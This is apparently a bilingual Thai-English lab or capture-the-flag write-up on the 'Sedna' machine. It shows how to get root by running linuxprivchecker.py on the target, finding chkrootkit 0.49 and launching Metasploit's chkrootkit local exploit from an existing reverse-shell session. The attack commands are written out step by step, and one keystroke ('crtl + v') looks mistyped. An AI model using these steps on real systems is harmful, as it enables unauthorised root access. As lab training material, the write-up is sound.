How to escalate the privilege by Chkrootkit 0.49 (Configuration files) – Sedna

บทนำ (Overview)

จากบทความก่อนหน้าอธิบายถึงช่องโหว่ของ Web application โปรแกรมติดตามเพิ่มเติมได้จาก How to upload PHP shell – Sedna (BuilderEngine 3.5.0)  มาในบทความนี้กล่าวถึงวิธีการตรวจสอบช่องโหว่ของโปรแกรมอื่น ๆ ที่ถูกติดตั้งภายในระบบปฏิบัติการ ที่อาจมีช่องโหว่นำไปสู่การยกระดับสิทธิให้สูงจากเดิมเป็นผู้ดูแลระบบ

This article describes the steps of reviewing the vulnerability of packages which were installed in Operating System. These packages may be exploited to escalate the privileges to the administrator.  

ขั้นตอน (Steps)

  1. ดาวน์โหลด Linux Privilege Escalation Scripts จากเว็บไซต์ http://netsec.ws/?p=309
    Download Linux privilege Escalation Script from http://netsec.ws/?p=309
  2. จากนั้น upload โหลดไปยังเครื่องเป้าหมาย และเปลี่ยน permission ให้สามารถ Execute ได้
    Upload the script to the target machine and then, change the permission to group which could be executed as the following commands:

    chmod 777 linuxprivchecker.py
    python linuxprivchecker.py
    


  3. เราสามารถหาโปรแกรมที่ติดตั้งเพิ่มเติมได้ที่ส่วนของ Config file ตามข้างล่าง
    Try to other packages installed in OS as the followings:

    [+] Config files containing keyword 'password'
    

  4. เราพบโฟลเดอร์ของ chkrootkit ที่อยู่ใน /etc น่าสนใจ จึงทดลองเข้าไปและเรียกใช้งานโปรแกรมดังกล่าว โดยตรวจสอบเวอร์ชันของโปรแกรมดังนี้
    We found the folder of chkrootkit application stored in /etc folder. Try to access and review the version of the installed application.

    cd /etc/chkrootkit
    ./chkrootkit -V
    

  5. เราพบว่าเวอร์ชันดังกล่าวมีช่องโหว่ในการสามารถยกระดับสิทธิให้เป็นผู้ดูแลระบบได้ดังนี้
    We found that version of chkrootkit (0.49) that was vulnerable to escalate the privilege to the administrator.

    https://www.exploit-db.com/exploits/33899/ 
    

  6. จาก Reverse shell ที่เชื่อมต่อเราสามารถกลับมาที่หน้า meterpreter ได้โดยใช้คำสั่ง crtl + v และตอบ N
    From the reverse shell, we could return to meterpreter prompt by using crtl + v and input N.
  7. จากนั้นใช้คำสั่งตามข้างล่าง
    Next, using the command as the followings:

    background
    use exploit/unix/local/chkrootkit
    show sessions
    set session 1
    exploit
    

ใส่ความเห็น